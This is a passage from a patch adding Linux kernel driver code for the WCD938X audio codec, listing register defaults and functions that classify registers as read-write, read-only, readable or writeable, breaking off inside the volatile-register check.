++	{WCD938X_DIGITAL_EFUSE_REG_14,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_15,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_16,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_17,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_18,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_19,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_20,                         0x0E},
++	{WCD938X_DIGITAL_EFUSE_REG_21,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_22,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_23,                         0xF8},
++	{WCD938X_DIGITAL_EFUSE_REG_24,                         0x16},
++	{WCD938X_DIGITAL_EFUSE_REG_25,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_26,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_27,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_28,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_29,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_30,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_31,                         0x00},
++	{WCD938X_DIGITAL_TX_REQ_FB_CTL_0,                      0x88},
++	{WCD938X_DIGITAL_TX_REQ_FB_CTL_1,                      0x88},
++	{WCD938X_DIGITAL_TX_REQ_FB_CTL_2,                      0x88},
++	{WCD938X_DIGITAL_TX_REQ_FB_CTL_3,                      0x88},
++	{WCD938X_DIGITAL_TX_REQ_FB_CTL_4,                      0x88},
++	{WCD938X_DIGITAL_DEM_BYPASS_DATA0,                     0x55},
++	{WCD938X_DIGITAL_DEM_BYPASS_DATA1,                     0x55},
++	{WCD938X_DIGITAL_DEM_BYPASS_DATA2,                     0x55},
++	{WCD938X_DIGITAL_DEM_BYPASS_DATA3,                     0x01},
++};
++
++static bool wcd938x_rdwr_register(struct device *dev, unsigned int reg)
++{
++	switch (reg) {
++	case WCD938X_ANA_PAGE_REGISTER:
++	case WCD938X_ANA_BIAS:
++	case WCD938X_ANA_RX_SUPPLIES:
++	case WCD938X_ANA_HPH:
++	case WCD938X_ANA_EAR:
++	case WCD938X_ANA_EAR_COMPANDER_CTL:
++	case WCD938X_ANA_TX_CH1:
++	case WCD938X_ANA_TX_CH2:
++	case WCD938X_ANA_TX_CH3:
++	case WCD938X_ANA_TX_CH4:
++	case WCD938X_ANA_MICB1_MICB2_DSP_EN_LOGIC:
++	case WCD938X_ANA_MICB3_DSP_EN_LOGIC:
++	case WCD938X_ANA_MBHC_MECH:
++	case WCD938X_ANA_MBHC_ELECT:
++	case WCD938X_ANA_MBHC_ZDET:
++	case WCD938X_ANA_MBHC_BTN0:
++	case WCD938X_ANA_MBHC_BTN1:
++	case WCD938X_ANA_MBHC_BTN2:
++	case WCD938X_ANA_MBHC_BTN3:
++	case WCD938X_ANA_MBHC_BTN4:
++	case WCD938X_ANA_MBHC_BTN5:
++	case WCD938X_ANA_MBHC_BTN6:
++	case WCD938X_ANA_MBHC_BTN7:
++	case WCD938X_ANA_MICB1:
++	case WCD938X_ANA_MICB2:
++	case WCD938X_ANA_MICB2_RAMP:
++	case WCD938X_ANA_MICB3:
++	case WCD938X_ANA_MICB4:
++	case WCD938X_BIAS_CTL:
++	case WCD938X_BIAS_VBG_FINE_ADJ:
++	case WCD938X_LDOL_VDDCX_ADJUST:
++	case WCD938X_LDOL_DISABLE_LDOL:
++	case WCD938X_MBHC_CTL_CLK:
++	case WCD938X_MBHC_CTL_ANA:
++	case WCD938X_MBHC_CTL_SPARE_1:
++	case WCD938X_MBHC_CTL_SPARE_2:
++	case WCD938X_MBHC_CTL_BCS:
++	case WCD938X_MBHC_TEST_CTL:
++	case WCD938X_LDOH_MODE:
++	case WCD938X_LDOH_BIAS:
++	case WCD938X_LDOH_STB_LOADS:
++	case WCD938X_LDOH_SLOWRAMP:
++	case WCD938X_MICB1_TEST_CTL_1:
++	case WCD938X_MICB1_TEST_CTL_2:
++	case WCD938X_MICB1_TEST_CTL_3:
++	case WCD938X_MICB2_TEST_CTL_1:
++	case WCD938X_MICB2_TEST_CTL_2:
++	case WCD938X_MICB2_TEST_CTL_3:
++	case WCD938X_MICB3_TEST_CTL_1:
++	case WCD938X_MICB3_TEST_CTL_2:
++	case WCD938X_MICB3_TEST_CTL_3:
++	case WCD938X_MICB4_TEST_CTL_1:
++	case WCD938X_MICB4_TEST_CTL_2:
++	case WCD938X_MICB4_TEST_CTL_3:
++	case WCD938X_TX_COM_ADC_VCM:
++	case WCD938X_TX_COM_BIAS_ATEST:
++	case WCD938X_TX_COM_SPARE1:
++	case WCD938X_TX_COM_SPARE2:
++	case WCD938X_TX_COM_TXFE_DIV_CTL:
++	case WCD938X_TX_COM_TXFE_DIV_START:
++	case WCD938X_TX_COM_SPARE3:
++	case WCD938X_TX_COM_SPARE4:
++	case WCD938X_TX_1_2_TEST_EN:
++	case WCD938X_TX_1_2_ADC_IB:
++	case WCD938X_TX_1_2_ATEST_REFCTL:
++	case WCD938X_TX_1_2_TEST_CTL:
++	case WCD938X_TX_1_2_TEST_BLK_EN1:
++	case WCD938X_TX_1_2_TXFE1_CLKDIV:
++	case WCD938X_TX_3_4_TEST_EN:
++	case WCD938X_TX_3_4_ADC_IB:
++	case WCD938X_TX_3_4_ATEST_REFCTL:
++	case WCD938X_TX_3_4_TEST_CTL:
++	case WCD938X_TX_3_4_TEST_BLK_EN3:
++	case WCD938X_TX_3_4_TXFE3_CLKDIV:
++	case WCD938X_TX_3_4_TEST_BLK_EN2:
++	case WCD938X_TX_3_4_TXFE2_CLKDIV:
++	case WCD938X_TX_3_4_SPARE1:
++	case WCD938X_TX_3_4_TEST_BLK_EN4:
++	case WCD938X_TX_3_4_TXFE4_CLKDIV:
++	case WCD938X_TX_3_4_SPARE2:
++	case WCD938X_CLASSH_MODE_1:
++	case WCD938X_CLASSH_MODE_2:
++	case WCD938X_CLASSH_MODE_3:
++	case WCD938X_CLASSH_CTRL_VCL_1:
++	case WCD938X_CLASSH_CTRL_VCL_2:
++	case WCD938X_CLASSH_CTRL_CCL_1:
++	case WCD938X_CLASSH_CTRL_CCL_2:
++	case WCD938X_CLASSH_CTRL_CCL_3:
++	case WCD938X_CLASSH_CTRL_CCL_4:
++	case WCD938X_CLASSH_CTRL_CCL_5:
++	case WCD938X_CLASSH_BUCK_TMUX_A_D:
++	case WCD938X_CLASSH_BUCK_SW_DRV_CNTL:
++	case WCD938X_CLASSH_SPARE:
++	case WCD938X_FLYBACK_EN:
++	case WCD938X_FLYBACK_VNEG_CTRL_1:
++	case WCD938X_FLYBACK_VNEG_CTRL_2:
++	case WCD938X_FLYBACK_VNEG_CTRL_3:
++	case WCD938X_FLYBACK_VNEG_CTRL_4:
++	case WCD938X_FLYBACK_VNEG_CTRL_5:
++	case WCD938X_FLYBACK_VNEG_CTRL_6:
++	case WCD938X_FLYBACK_VNEG_CTRL_7:
++	case WCD938X_FLYBACK_VNEG_CTRL_8:
++	case WCD938X_FLYBACK_VNEG_CTRL_9:
++	case WCD938X_FLYBACK_VNEGDAC_CTRL_1:
++	case WCD938X_FLYBACK_VNEGDAC_CTRL_2:
++	case WCD938X_FLYBACK_VNEGDAC_CTRL_3:
++	case WCD938X_FLYBACK_CTRL_1:
++	case WCD938X_FLYBACK_TEST_CTL:
++	case WCD938X_RX_AUX_SW_CTL:
++	case WCD938X_RX_PA_AUX_IN_CONN:
++	case WCD938X_RX_TIMER_DIV:
++	case WCD938X_RX_OCP_CTL:
++	case WCD938X_RX_OCP_COUNT:
++	case WCD938X_RX_BIAS_EAR_DAC:
++	case WCD938X_RX_BIAS_EAR_AMP:
++	case WCD938X_RX_BIAS_HPH_LDO:
++	case WCD938X_RX_BIAS_HPH_PA:
++	case WCD938X_RX_BIAS_HPH_RDACBUFF_CNP2:
++	case WCD938X_RX_BIAS_HPH_RDAC_LDO:
++	case WCD938X_RX_BIAS_HPH_CNP1:
++	case WCD938X_RX_BIAS_HPH_LOWPOWER:
++	case WCD938X_RX_BIAS_AUX_DAC:
++	case WCD938X_RX_BIAS_AUX_AMP:
++	case WCD938X_RX_BIAS_VNEGDAC_BLEEDER:
++	case WCD938X_RX_BIAS_MISC:
++	case WCD938X_RX_BIAS_BUCK_RST:
++	case WCD938X_RX_BIAS_BUCK_VREF_ERRAMP:
++	case WCD938X_RX_BIAS_FLYB_ERRAMP:
++	case WCD938X_RX_BIAS_FLYB_BUFF:
++	case WCD938X_RX_BIAS_FLYB_MID_RST:
++	case WCD938X_HPH_CNP_EN:
++	case WCD938X_HPH_CNP_WG_CTL:
++	case WCD938X_HPH_CNP_WG_TIME:
++	case WCD938X_HPH_OCP_CTL:
++	case WCD938X_HPH_AUTO_CHOP:
++	case WCD938X_HPH_CHOP_CTL:
++	case WCD938X_HPH_PA_CTL1:
++	case WCD938X_HPH_PA_CTL2:
++	case WCD938X_HPH_L_EN:
++	case WCD938X_HPH_L_TEST:
++	case WCD938X_HPH_L_ATEST:
++	case WCD938X_HPH_R_EN:
++	case WCD938X_HPH_R_TEST:
++	case WCD938X_HPH_R_ATEST:
++	case WCD938X_HPH_RDAC_CLK_CTL1:
++	case WCD938X_HPH_RDAC_CLK_CTL2:
++	case WCD938X_HPH_RDAC_LDO_CTL:
++	case WCD938X_HPH_RDAC_CHOP_CLK_LP_CTL:
++	case WCD938X_HPH_REFBUFF_UHQA_CTL:
++	case WCD938X_HPH_REFBUFF_LP_CTL:
++	case WCD938X_HPH_L_DAC_CTL:
++	case WCD938X_HPH_R_DAC_CTL:
++	case WCD938X_HPH_SURGE_HPHLR_SURGE_COMP_SEL:
++	case WCD938X_HPH_SURGE_HPHLR_SURGE_EN:
++	case WCD938X_HPH_SURGE_HPHLR_SURGE_MISC1:
++	case WCD938X_EAR_EAR_EN_REG:
++	case WCD938X_EAR_EAR_PA_CON:
++	case WCD938X_EAR_EAR_SP_CON:
++	case WCD938X_EAR_EAR_DAC_CON:
++	case WCD938X_EAR_EAR_CNP_FSM_CON:
++	case WCD938X_EAR_TEST_CTL:
++	case WCD938X_ANA_NEW_PAGE_REGISTER:
++	case WCD938X_HPH_NEW_ANA_HPH2:
++	case WCD938X_HPH_NEW_ANA_HPH3:
++	case WCD938X_SLEEP_CTL:
++	case WCD938X_SLEEP_WATCHDOG_CTL:
++	case WCD938X_MBHC_NEW_ELECT_REM_CLAMP_CTL:
++	case WCD938X_MBHC_NEW_CTL_1:
++	case WCD938X_MBHC_NEW_CTL_2:
++	case WCD938X_MBHC_NEW_PLUG_DETECT_CTL:
++	case WCD938X_MBHC_NEW_ZDET_ANA_CTL:
++	case WCD938X_MBHC_NEW_ZDET_RAMP_CTL:
++	case WCD938X_TX_NEW_AMIC_MUX_CFG:
++	case WCD938X_AUX_AUXPA:
++	case WCD938X_LDORXTX_MODE:
++	case WCD938X_LDORXTX_CONFIG:
++	case WCD938X_DIE_CRACK_DIE_CRK_DET_EN:
++	case WCD938X_HPH_NEW_INT_RDAC_GAIN_CTL:
++	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L:
++	case WCD938X_HPH_NEW_INT_RDAC_VREF_CTL:
++	case WCD938X_HPH_NEW_INT_RDAC_OVERRIDE_CTL:
++	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R:
++	case WCD938X_HPH_NEW_INT_PA_MISC1:
++	case WCD938X_HPH_NEW_INT_PA_MISC2:
++	case WCD938X_HPH_NEW_INT_PA_RDAC_MISC:
++	case WCD938X_HPH_NEW_INT_HPH_TIMER1:
++	case WCD938X_HPH_NEW_INT_HPH_TIMER2:
++	case WCD938X_HPH_NEW_INT_HPH_TIMER3:
++	case WCD938X_HPH_NEW_INT_HPH_TIMER4:
++	case WCD938X_HPH_NEW_INT_PA_RDAC_MISC2:
++	case WCD938X_HPH_NEW_INT_PA_RDAC_MISC3:
++	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L_NEW:
++	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R_NEW:
++	case WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_LOHIFI:
++	case WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_ULP:
++	case WCD938X_RX_NEW_INT_HPH_RDAC_LDO_LP:
++	case WCD938X_MBHC_NEW_INT_MOISTURE_DET_DC_CTRL:
++	case WCD938X_MBHC_NEW_INT_MOISTURE_DET_POLLING_CTRL:
++	case WCD938X_MBHC_NEW_INT_MECH_DET_CURRENT:
++	case WCD938X_MBHC_NEW_INT_SPARE_2:
++	case WCD938X_EAR_INT_NEW_EAR_CHOPPER_CON:
++	case WCD938X_EAR_INT_NEW_CNP_VCM_CON1:
++	case WCD938X_EAR_INT_NEW_CNP_VCM_CON2:
++	case WCD938X_EAR_INT_NEW_EAR_DYNAMIC_BIAS:
++	case WCD938X_AUX_INT_EN_REG:
++	case WCD938X_AUX_INT_PA_CTRL:
++	case WCD938X_AUX_INT_SP_CTRL:
++	case WCD938X_AUX_INT_DAC_CTRL:
++	case WCD938X_AUX_INT_CLK_CTRL:
++	case WCD938X_AUX_INT_TEST_CTRL:
++	case WCD938X_AUX_INT_MISC:
++	case WCD938X_LDORXTX_INT_BIAS:
++	case WCD938X_LDORXTX_INT_STB_LOADS_DTEST:
++	case WCD938X_LDORXTX_INT_TEST0:
++	case WCD938X_LDORXTX_INT_STARTUP_TIMER:
++	case WCD938X_LDORXTX_INT_TEST1:
++	case WCD938X_SLEEP_INT_WATCHDOG_CTL_1:
++	case WCD938X_SLEEP_INT_WATCHDOG_CTL_2:
++	case WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT1:
++	case WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT2:
++	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L2:
++	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L1:
++	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L0:
++	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP1P2M:
++	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP0P6M:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L2L1:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L0:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_ULP:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L2L1:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L0:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_ULP:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_L2L1L0:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_ULP:
++	case WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L2L1:
++	case WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L0ULP:
++	case WCD938X_TX_COM_NEW_INT_TXADC_INT_L2:
++	case WCD938X_TX_COM_NEW_INT_TXADC_INT_L1:
++	case WCD938X_TX_COM_NEW_INT_TXADC_INT_L0:
++	case WCD938X_TX_COM_NEW_INT_TXADC_INT_ULP:
++	case WCD938X_DIGITAL_PAGE_REGISTER:
++	case WCD938X_DIGITAL_SWR_TX_CLK_RATE:
++	case WCD938X_DIGITAL_CDC_RST_CTL:
++	case WCD938X_DIGITAL_TOP_CLK_CFG:
++	case WCD938X_DIGITAL_CDC_ANA_CLK_CTL:
++	case WCD938X_DIGITAL_CDC_DIG_CLK_CTL:
++	case WCD938X_DIGITAL_SWR_RST_EN:
++	case WCD938X_DIGITAL_CDC_PATH_MODE:
++	case WCD938X_DIGITAL_CDC_RX_RST:
++	case WCD938X_DIGITAL_CDC_RX0_CTL:
++	case WCD938X_DIGITAL_CDC_RX1_CTL:
++	case WCD938X_DIGITAL_CDC_RX2_CTL:
++	case WCD938X_DIGITAL_CDC_TX_ANA_MODE_0_1:
++	case WCD938X_DIGITAL_CDC_TX_ANA_MODE_2_3:
++	case WCD938X_DIGITAL_CDC_COMP_CTL_0:
++	case WCD938X_DIGITAL_CDC_ANA_TX_CLK_CTL:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A1_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A1_1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A2_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A2_1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A3_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A3_1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A4_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A4_1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A5_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A5_1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A6_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A7_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_C_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_C_1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_C_2:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_C_3:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R2:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R3:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R4:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R5:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R6:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R7:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A1_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A1_1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A2_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A2_1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A3_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A3_1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A4_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A4_1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A5_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A5_1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A6_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A7_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_C_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_C_1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_C_2:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_C_3:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R2:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R3:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R4:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R5:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R6:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R7:
++	case WCD938X_DIGITAL_CDC_HPH_GAIN_RX_0:
++	case WCD938X_DIGITAL_CDC_HPH_GAIN_RX_1:
++	case WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_0:
++	case WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_1:
++	case WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_2:
++	case WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_0:
++	case WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_1:
++	case WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_2:
++	case WCD938X_DIGITAL_CDC_HPH_GAIN_CTL:
++	case WCD938X_DIGITAL_CDC_AUX_GAIN_CTL:
++	case WCD938X_DIGITAL_CDC_EAR_PATH_CTL:
++	case WCD938X_DIGITAL_CDC_SWR_CLH:
++	case WCD938X_DIGITAL_SWR_CLH_BYP:
++	case WCD938X_DIGITAL_CDC_TX0_CTL:
++	case WCD938X_DIGITAL_CDC_TX1_CTL:
++	case WCD938X_DIGITAL_CDC_TX2_CTL:
++	case WCD938X_DIGITAL_CDC_TX_RST:
++	case WCD938X_DIGITAL_CDC_REQ_CTL:
++	case WCD938X_DIGITAL_CDC_RST:
++	case WCD938X_DIGITAL_CDC_AMIC_CTL:
++	case WCD938X_DIGITAL_CDC_DMIC_CTL:
++	case WCD938X_DIGITAL_CDC_DMIC1_CTL:
++	case WCD938X_DIGITAL_CDC_DMIC2_CTL:
++	case WCD938X_DIGITAL_CDC_DMIC3_CTL:
++	case WCD938X_DIGITAL_CDC_DMIC4_CTL:
++	case WCD938X_DIGITAL_EFUSE_PRG_CTL:
++	case WCD938X_DIGITAL_EFUSE_CTL:
++	case WCD938X_DIGITAL_CDC_DMIC_RATE_1_2:
++	case WCD938X_DIGITAL_CDC_DMIC_RATE_3_4:
++	case WCD938X_DIGITAL_PDM_WD_CTL0:
++	case WCD938X_DIGITAL_PDM_WD_CTL1:
++	case WCD938X_DIGITAL_PDM_WD_CTL2:
++	case WCD938X_DIGITAL_INTR_MODE:
++	case WCD938X_DIGITAL_INTR_MASK_0:
++	case WCD938X_DIGITAL_INTR_MASK_1:
++	case WCD938X_DIGITAL_INTR_MASK_2:
++	case WCD938X_DIGITAL_INTR_CLEAR_0:
++	case WCD938X_DIGITAL_INTR_CLEAR_1:
++	case WCD938X_DIGITAL_INTR_CLEAR_2:
++	case WCD938X_DIGITAL_INTR_LEVEL_0:
++	case WCD938X_DIGITAL_INTR_LEVEL_1:
++	case WCD938X_DIGITAL_INTR_LEVEL_2:
++	case WCD938X_DIGITAL_INTR_SET_0:
++	case WCD938X_DIGITAL_INTR_SET_1:
++	case WCD938X_DIGITAL_INTR_SET_2:
++	case WCD938X_DIGITAL_INTR_TEST_0:
++	case WCD938X_DIGITAL_INTR_TEST_1:
++	case WCD938X_DIGITAL_INTR_TEST_2:
++	case WCD938X_DIGITAL_TX_MODE_DBG_EN:
++	case WCD938X_DIGITAL_TX_MODE_DBG_0_1:
++	case WCD938X_DIGITAL_TX_MODE_DBG_2_3:
++	case WCD938X_DIGITAL_LB_IN_SEL_CTL:
++	case WCD938X_DIGITAL_LOOP_BACK_MODE:
++	case WCD938X_DIGITAL_SWR_DAC_TEST:
++	case WCD938X_DIGITAL_SWR_HM_TEST_RX_0:
++	case WCD938X_DIGITAL_SWR_HM_TEST_TX_0:
++	case WCD938X_DIGITAL_SWR_HM_TEST_RX_1:
++	case WCD938X_DIGITAL_SWR_HM_TEST_TX_1:
++	case WCD938X_DIGITAL_SWR_HM_TEST_TX_2:
++	case WCD938X_DIGITAL_PAD_CTL_SWR_0:
++	case WCD938X_DIGITAL_PAD_CTL_SWR_1:
++	case WCD938X_DIGITAL_I2C_CTL:
++	case WCD938X_DIGITAL_CDC_TX_TANGGU_SW_MODE:
++	case WCD938X_DIGITAL_EFUSE_TEST_CTL_0:
++	case WCD938X_DIGITAL_EFUSE_TEST_CTL_1:
++	case WCD938X_DIGITAL_PAD_CTL_PDM_RX0:
++	case WCD938X_DIGITAL_PAD_CTL_PDM_RX1:
++	case WCD938X_DIGITAL_PAD_CTL_PDM_TX0:
++	case WCD938X_DIGITAL_PAD_CTL_PDM_TX1:
++	case WCD938X_DIGITAL_PAD_CTL_PDM_TX2:
++	case WCD938X_DIGITAL_PAD_INP_DIS_0:
++	case WCD938X_DIGITAL_PAD_INP_DIS_1:
++	case WCD938X_DIGITAL_DRIVE_STRENGTH_0:
++	case WCD938X_DIGITAL_DRIVE_STRENGTH_1:
++	case WCD938X_DIGITAL_DRIVE_STRENGTH_2:
++	case WCD938X_DIGITAL_RX_DATA_EDGE_CTL:
++	case WCD938X_DIGITAL_TX_DATA_EDGE_CTL:
++	case WCD938X_DIGITAL_GPIO_MODE:
++	case WCD938X_DIGITAL_PIN_CTL_OE:
++	case WCD938X_DIGITAL_PIN_CTL_DATA_0:
++	case WCD938X_DIGITAL_PIN_CTL_DATA_1:
++	case WCD938X_DIGITAL_DIG_DEBUG_CTL:
++	case WCD938X_DIGITAL_DIG_DEBUG_EN:
++	case WCD938X_DIGITAL_ANA_CSR_DBG_ADD:
++	case WCD938X_DIGITAL_ANA_CSR_DBG_CTL:
++	case WCD938X_DIGITAL_SSP_DBG:
++	case WCD938X_DIGITAL_SPARE_0:
++	case WCD938X_DIGITAL_SPARE_1:
++	case WCD938X_DIGITAL_SPARE_2:
++	case WCD938X_DIGITAL_TX_REQ_FB_CTL_0:
++	case WCD938X_DIGITAL_TX_REQ_FB_CTL_1:
++	case WCD938X_DIGITAL_TX_REQ_FB_CTL_2:
++	case WCD938X_DIGITAL_TX_REQ_FB_CTL_3:
++	case WCD938X_DIGITAL_TX_REQ_FB_CTL_4:
++	case WCD938X_DIGITAL_DEM_BYPASS_DATA0:
++	case WCD938X_DIGITAL_DEM_BYPASS_DATA1:
++	case WCD938X_DIGITAL_DEM_BYPASS_DATA2:
++	case WCD938X_DIGITAL_DEM_BYPASS_DATA3:
++		return true;
++	}
++
++	return false;
++}
++
++static bool wcd938x_readonly_register(struct device *dev, unsigned int reg)
++{
++	switch (reg) {
++	case WCD938X_ANA_MBHC_RESULT_1:
++	case WCD938X_ANA_MBHC_RESULT_2:
++	case WCD938X_ANA_MBHC_RESULT_3:
++	case WCD938X_MBHC_MOISTURE_DET_FSM_STATUS:
++	case WCD938X_TX_1_2_SAR2_ERR:
++	case WCD938X_TX_1_2_SAR1_ERR:
++	case WCD938X_TX_3_4_SAR4_ERR:
++	case WCD938X_TX_3_4_SAR3_ERR:
++	case WCD938X_HPH_L_STATUS:
++	case WCD938X_HPH_R_STATUS:
++	case WCD938X_HPH_SURGE_HPHLR_SURGE_STATUS:
++	case WCD938X_EAR_STATUS_REG_1:
++	case WCD938X_EAR_STATUS_REG_2:
++	case WCD938X_MBHC_NEW_FSM_STATUS:
++	case WCD938X_MBHC_NEW_ADC_RESULT:
++	case WCD938X_DIE_CRACK_DIE_CRK_DET_OUT:
++	case WCD938X_AUX_INT_STATUS_REG:
++	case WCD938X_LDORXTX_INT_STATUS:
++	case WCD938X_DIGITAL_CHIP_ID0:
++	case WCD938X_DIGITAL_CHIP_ID1:
++	case WCD938X_DIGITAL_CHIP_ID2:
++	case WCD938X_DIGITAL_CHIP_ID3:
++	case WCD938X_DIGITAL_INTR_STATUS_0:
++	case WCD938X_DIGITAL_INTR_STATUS_1:
++	case WCD938X_DIGITAL_INTR_STATUS_2:
++	case WCD938X_DIGITAL_INTR_CLEAR_0:
++	case WCD938X_DIGITAL_INTR_CLEAR_1:
++	case WCD938X_DIGITAL_INTR_CLEAR_2:
++	case WCD938X_DIGITAL_SWR_HM_TEST_0:
++	case WCD938X_DIGITAL_SWR_HM_TEST_1:
++	case WCD938X_DIGITAL_EFUSE_T_DATA_0:
++	case WCD938X_DIGITAL_EFUSE_T_DATA_1:
++	case WCD938X_DIGITAL_PIN_STATUS_0:
++	case WCD938X_DIGITAL_PIN_STATUS_1:
++	case WCD938X_DIGITAL_MODE_STATUS_0:
++	case WCD938X_DIGITAL_MODE_STATUS_1:
++	case WCD938X_DIGITAL_EFUSE_REG_0:
++	case WCD938X_DIGITAL_EFUSE_REG_1:
++	case WCD938X_DIGITAL_EFUSE_REG_2:
++	case WCD938X_DIGITAL_EFUSE_REG_3:
++	case WCD938X_DIGITAL_EFUSE_REG_4:
++	case WCD938X_DIGITAL_EFUSE_REG_5:
++	case WCD938X_DIGITAL_EFUSE_REG_6:
++	case WCD938X_DIGITAL_EFUSE_REG_7:
++	case WCD938X_DIGITAL_EFUSE_REG_8:
++	case WCD938X_DIGITAL_EFUSE_REG_9:
++	case WCD938X_DIGITAL_EFUSE_REG_10:
++	case WCD938X_DIGITAL_EFUSE_REG_11:
++	case WCD938X_DIGITAL_EFUSE_REG_12:
++	case WCD938X_DIGITAL_EFUSE_REG_13:
++	case WCD938X_DIGITAL_EFUSE_REG_14:
++	case WCD938X_DIGITAL_EFUSE_REG_15:
++	case WCD938X_DIGITAL_EFUSE_REG_16:
++	case WCD938X_DIGITAL_EFUSE_REG_17:
++	case WCD938X_DIGITAL_EFUSE_REG_18:
++	case WCD938X_DIGITAL_EFUSE_REG_19:
++	case WCD938X_DIGITAL_EFUSE_REG_20:
++	case WCD938X_DIGITAL_EFUSE_REG_21:
++	case WCD938X_DIGITAL_EFUSE_REG_22:
++	case WCD938X_DIGITAL_EFUSE_REG_23:
++	case WCD938X_DIGITAL_EFUSE_REG_24:
++	case WCD938X_DIGITAL_EFUSE_REG_25:
++	case WCD938X_DIGITAL_EFUSE_REG_26:
++	case WCD938X_DIGITAL_EFUSE_REG_27:
++	case WCD938X_DIGITAL_EFUSE_REG_28:
++	case WCD938X_DIGITAL_EFUSE_REG_29:
++	case WCD938X_DIGITAL_EFUSE_REG_30:
++	case WCD938X_DIGITAL_EFUSE_REG_31:
++		return true;
++	}
++	return false;
++}
++
++static bool wcd938x_readable_register(struct device *dev, unsigned int reg)
++{
++	bool ret;
++
++	ret = wcd938x_readonly_register(dev, reg);
++	if (!ret)
++		return wcd938x_rdwr_register(dev, reg);
++
++	return ret;
++}
++
++static bool wcd938x_writeable_register(struct device *dev, unsigned int reg)
++{
++	return wcd938x_rdwr_register(dev, reg);
++}
++
++static bool wcd938x_volatile_register(struct device *dev, unsigned int reg)
++{
++	if (reg <= WCD938X_BASE_ADDRESS)
++		return false;
++
